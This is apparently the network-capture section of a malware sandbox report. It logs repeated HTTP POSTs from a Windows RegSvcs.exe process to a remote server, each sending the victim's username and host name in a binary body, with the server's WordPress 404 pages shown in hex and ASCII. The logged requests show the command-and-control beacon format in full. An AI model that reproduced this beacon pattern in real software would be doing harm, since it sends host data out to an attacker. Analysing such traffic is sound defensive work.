                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:06.365319967 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:45:06.365372896 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:45:06.365391016 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:45:06.365406990 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:45:06.365425110 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:45:06.365442038 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:06.365467072 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:45:06.365483999 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:45:06.365503073 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            69192.168.2.94978445.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:06.533178091 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:06.538678885 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:09.043510914 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:07 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:09.043608904 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:09.043617964 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:09.043628931 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:09.043638945 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:09.043648958 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:09.043658018 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:09.043669939 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:09.043680906 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:45:09.043718100 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            70192.168.2.94978545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:09.224416971 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:09.229254961 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:14.981378078 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:09 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:14.981386900 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:14.981398106 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:14.981436014 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:45:14.981447935 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:45:14.981479883 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:45:14.981725931 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:14.981745005 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:45:14.981903076 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:45:14.981920958 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            71192.168.2.94978645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:15.181529999 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
